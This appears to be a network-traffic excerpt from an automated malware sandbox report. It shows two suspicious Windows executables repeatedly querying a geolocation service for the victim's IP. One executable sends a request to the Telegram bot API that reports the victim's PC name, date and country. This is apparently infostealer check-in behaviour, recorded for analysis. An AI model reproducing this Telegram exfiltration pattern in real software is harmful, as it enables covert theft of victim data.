                                                                              2024-10-07 06:51:26 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                                              Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                                              2024-10-07 06:51:26 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                              Data Ascii: 0


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              8192.168.2.449750188.114.96.34437540C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-10-07 06:51:26 UTC60OUTGET /xml/8.46.123.33 HTTP/1.1
                                                                              Host: reallyfreegeoip.org
                                                                              2024-10-07 06:51:26 UTC682INHTTP/1.1 200 OK
                                                                              Date: Mon, 07 Oct 2024 06:51:26 GMT
                                                                              Content-Type: application/xml
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              access-control-allow-origin: *
                                                                              vary: Accept-Encoding
                                                                              Cache-Control: max-age=86400
                                                                              CF-Cache-Status: HIT
                                                                              Age: 40221
                                                                              Last-Modified: Sun, 06 Oct 2024 19:41:05 GMT
                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=95vSSbXUAWcjA3rqkNa0rvN3U89WfkiJIVQAygxENQLcwvKspU%2BT1xr0sl%2B%2FQBzZoEmYcmMfZXxgMgcdrKCiBB8TVCV%2B%2FRuj7ry6iI0fwoTbmc375z2EBz1TfH8T%2BmOQIGiDzLlG"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                              Server: cloudflare
                                                                              CF-RAY: 8cebf673acc37cea-EWR
                                                                              2024-10-07 06:51:26 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                                              Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                                              2024-10-07 06:51:26 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                              Data Ascii: 0


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              9192.168.2.449753188.114.96.34437180C:\Users\user\Desktop\2i3Lj7a8Gk.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-10-07 06:51:27 UTC60OUTGET /xml/8.46.123.33 HTTP/1.1
                                                                              Host: reallyfreegeoip.org
                                                                              2024-10-07 06:51:27 UTC680INHTTP/1.1 200 OK
                                                                              Date: Mon, 07 Oct 2024 06:51:27 GMT
                                                                              Content-Type: application/xml
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              access-control-allow-origin: *
                                                                              vary: Accept-Encoding
                                                                              Cache-Control: max-age=86400
                                                                              CF-Cache-Status: HIT
                                                                              Age: 40222
                                                                              Last-Modified: Sun, 06 Oct 2024 19:41:05 GMT
                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1lG6oiRP22Y9fZkcbJvpgBKMnhDDG%2FjX3Su%2BlO5bTszVpGzbD8WbWkxPCvdh93P5q1z%2Bak90UO15oT5gqv%2B3BpkzW85xr2DkzSF%2BsYJ02zbnVq2VwC0Czjuw5W3lbsfRDJaZb4xr"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                              Server: cloudflare
                                                                              CF-RAY: 8cebf67b5dde43fb-EWR
                                                                              2024-10-07 06:51:27 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                                              Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                                              2024-10-07 06:51:27 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                              Data Ascii: 0


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              10192.168.2.449754188.114.96.34437540C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-10-07 06:51:27 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                                                              Host: reallyfreegeoip.org
                                                                              Connection: Keep-Alive
                                                                              2024-10-07 06:51:27 UTC676INHTTP/1.1 200 OK
                                                                              Date: Mon, 07 Oct 2024 06:51:27 GMT
                                                                              Content-Type: application/xml
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              access-control-allow-origin: *
                                                                              vary: Accept-Encoding
                                                                              Cache-Control: max-age=86400
                                                                              CF-Cache-Status: HIT
                                                                              Age: 40222
                                                                              Last-Modified: Sun, 06 Oct 2024 19:41:05 GMT
                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FAZ0edlXCIqSs5woopB0oExpkjn7lC7LBy0bMxlbp1ahjvFMkKdN4e2PZN8TKw51dCRSWcaVNPsMOECTMjiyv3zGlVe346w8WeW1Wr%2BFaCYx9AdoJ7dZPwLcSJuLgVp7WfsLasR%2B"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                              Server: cloudflare
                                                                              CF-RAY: 8cebf67b89587d11-EWR
                                                                              2024-10-07 06:51:27 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                                              Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                                              2024-10-07 06:51:27 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                              Data Ascii: 0


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              11192.168.2.449757188.114.96.34437180C:\Users\user\Desktop\2i3Lj7a8Gk.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-10-07 06:51:29 UTC60OUTGET /xml/8.46.123.33 HTTP/1.1
                                                                              Host: reallyfreegeoip.org
                                                                              2024-10-07 06:51:29 UTC686INHTTP/1.1 200 OK
                                                                              Date: Mon, 07 Oct 2024 06:51:29 GMT
                                                                              Content-Type: application/xml
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              access-control-allow-origin: *
                                                                              vary: Accept-Encoding
                                                                              Cache-Control: max-age=86400
                                                                              CF-Cache-Status: HIT
                                                                              Age: 40224
                                                                              Last-Modified: Sun, 06 Oct 2024 19:41:05 GMT
                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QGD%2FVvbHRjEs1N%2FxzP3V4nmDY0b121aLoxLR93ugtGYbFOjMBiKMTX7Q2K%2F%2FiNGSHXIamhLSsTfnJkhVEmhsWX8imF9P4ego%2BE0fc9m2GjE%2BuIFQ%2BM0YngSw%2FaTD7iTQcDPhL6AM"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                              Server: cloudflare
                                                                              CF-RAY: 8cebf683486c8c29-EWR
                                                                              2024-10-07 06:51:29 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                                              Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                                              2024-10-07 06:51:29 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                              Data Ascii: 0


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              12192.168.2.449758188.114.96.34437540C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-10-07 06:51:29 UTC60OUTGET /xml/8.46.123.33 HTTP/1.1
                                                                              Host: reallyfreegeoip.org
                                                                              2024-10-07 06:51:29 UTC682INHTTP/1.1 200 OK
                                                                              Date: Mon, 07 Oct 2024 06:51:29 GMT
                                                                              Content-Type: application/xml
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              access-control-allow-origin: *
                                                                              vary: Accept-Encoding
                                                                              Cache-Control: max-age=86400
                                                                              CF-Cache-Status: HIT
                                                                              Age: 40224
                                                                              Last-Modified: Sun, 06 Oct 2024 19:41:05 GMT
                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SRj9R4bwsKKboTTJVAISPklygWQsSe3oqZ%2BfS9D9JQRVG%2BpxNvDzRsx0gvS54SGyugDh%2Bjis7nbX0by75jNp7ZSvHN2yWJIs%2BLDWLgq9yDHMBQgkJSnTzWjC6hATP%2BpJwLkSTv%2BV"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                              Server: cloudflare
                                                                              CF-RAY: 8cebf683af1f7c81-EWR
                                                                              2024-10-07 06:51:29 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                                              Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                                              2024-10-07 06:51:29 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                              Data Ascii: 0


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              13192.168.2.449761188.114.96.34437180C:\Users\user\Desktop\2i3Lj7a8Gk.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-10-07 06:51:30 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                                                              Host: reallyfreegeoip.org
                                                                              Connection: Keep-Alive
                                                                              2024-10-07 06:51:30 UTC676INHTTP/1.1 200 OK
                                                                              Date: Mon, 07 Oct 2024 06:51:30 GMT
                                                                              Content-Type: application/xml
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              access-control-allow-origin: *
                                                                              vary: Accept-Encoding
                                                                              Cache-Control: max-age=86400
                                                                              CF-Cache-Status: HIT
                                                                              Age: 40225
                                                                              Last-Modified: Sun, 06 Oct 2024 19:41:05 GMT
                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RCylzqB1oFkXL8QJJky05TZ8H2ZetnqRs7hg6TC1SzlEWfuE8RnqI9Ynnq9ADTy2ZIQ27vHBTzIueB%2FL1dABNYcXOy9a5kD%2BohQjSt6eNARW%2FNpnTJPIGYDpwXGNTjmfZhFePOhB"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                              Server: cloudflare
                                                                              CF-RAY: 8cebf68ba88d1768-EWR
                                                                              2024-10-07 06:51:30 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                                              Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                                              2024-10-07 06:51:30 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                              Data Ascii: 0


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              14192.168.2.449762188.114.96.34437540C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-10-07 06:51:30 UTC60OUTGET /xml/8.46.123.33 HTTP/1.1
                                                                              Host: reallyfreegeoip.org
                                                                              2024-10-07 06:51:30 UTC678INHTTP/1.1 200 OK
                                                                              Date: Mon, 07 Oct 2024 06:51:30 GMT
                                                                              Content-Type: application/xml
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              access-control-allow-origin: *
                                                                              vary: Accept-Encoding
                                                                              Cache-Control: max-age=86400
                                                                              CF-Cache-Status: HIT
                                                                              Age: 40225
                                                                              Last-Modified: Sun, 06 Oct 2024 19:41:05 GMT
                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HCaW2mYc3r0DuSBpbbkVShI%2F5Of7LnAuDJnwUCCC6CE4mOkL%2FCZY%2FN7AjBjtRS3%2FEGGcPXac4dDdUCnvWP1t3Apyrm9Er4lDXERK4Xz79qmyOC5Ss8vDBNYqTFFbdYSfFsl4r2vF"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                              Server: cloudflare
                                                                              CF-RAY: 8cebf68bf9a01784-EWR
                                                                              2024-10-07 06:51:30 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                                              Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                                              2024-10-07 06:51:30 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                              Data Ascii: 0


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              15192.168.2.449763149.154.167.2204437180C:\Users\user\Desktop\2i3Lj7a8Gk.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-10-07 06:51:31 UTC349OUTGET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:445817%0D%0ADate%20and%20Time:%2007/10/2024%20/%2015:26:03%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20445817%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
                                                                              Host: api.telegram.org
                                                                              Connection: Keep-Alive
                                                                              2024-10-07 06:51:31 UTC344INHTTP/1.1 404 Not Found
                                                                              Server: nginx/1.18.0
                                                                              Date: Mon, 07 Oct 2024 06:51:31 GMT
                                                                              Content-Type: application/json
                                                                              Content-Length: 55
                                                                              Connection: close
                                                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                              Access-Control-Allow-Origin: *
                                                                              Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                              2024-10-07 06:51:31 UTC55INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d
                                                                              Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              16192.168.2.449765188.114.96.34437540C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-10-07 06:51:31 UTC60OUTGET /xml/8.46.123.33 HTTP/1.1
                                                                              Host: reallyfreegeoip.org
                                                                              2024-10-07 06:51:31 UTC678INHTTP/1.1 200 OK
                                                                              Date: Mon, 07 Oct 2024 06:51:31 GMT
                                                                              Content-Type: application/xml
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              access-control-allow-origin: *
                                                                              vary: Accept-Encoding
                                                                              Cache-Control: max-age=86400
                                                                              CF-Cache-Status: HIT
                                                                              Age: 40226
                                                                              Last-Modified: Sun, 06 Oct 2024 19:41:05 GMT
                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ey32VVRl8ROC70GvQYhpJNeNNTUAUuchvSEYLZW%2Fr13Cjh2mgSp33XsDZThkAlMiXmzo9Hl7Nvq5lrcGv4gjlordm1SB1%2FrxP0mXUT%2FR8MmRk6kPS2Q32PVJlaVhGhNtUqFg%2BsYD"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                              Server: cloudflare
                                                                              CF-RAY: 8cebf6940e81c411-EWR
                                                                              2024-10-07 06:51:31 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                                              Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                                              2024-10-07 06:51:31 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                              Data Ascii: 0


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              17192.168.2.449769188.114.96.34437540C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-10-07 06:51:33 UTC60OUTGET /xml/8.46.123.33 HTTP/1.1
                                                                              Host: reallyfreegeoip.org
                                                                              2024-10-07 06:51:33 UTC674INHTTP/1.1 200 OK
                                                                              Date: Mon, 07 Oct 2024 06:51:33 GMT
                                                                              Content-Type: application/xml
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              access-control-allow-origin: *
                                                                              vary: Accept-Encoding
                                                                              Cache-Control: max-age=86400
                                                                              CF-Cache-Status: HIT
                                                                              Age: 40228
                                                                              Last-Modified: Sun, 06 Oct 2024 19:41:05 GMT
                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1qB744Aikkgsaz3dni8cljXkNTih5QhKDN6ZL%2FpLeJFa1alKz1NsylTyTyjg18KYHp8BAdSr1Re3aBagbGrNHlRgCMffzBQzwINmYVEjpIv%2F7FFsW8vXjnpaXmMvIvwog2u48IdV"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                              Server: cloudflare
                                                                              CF-RAY: 8cebf69c4bff3338-EWR
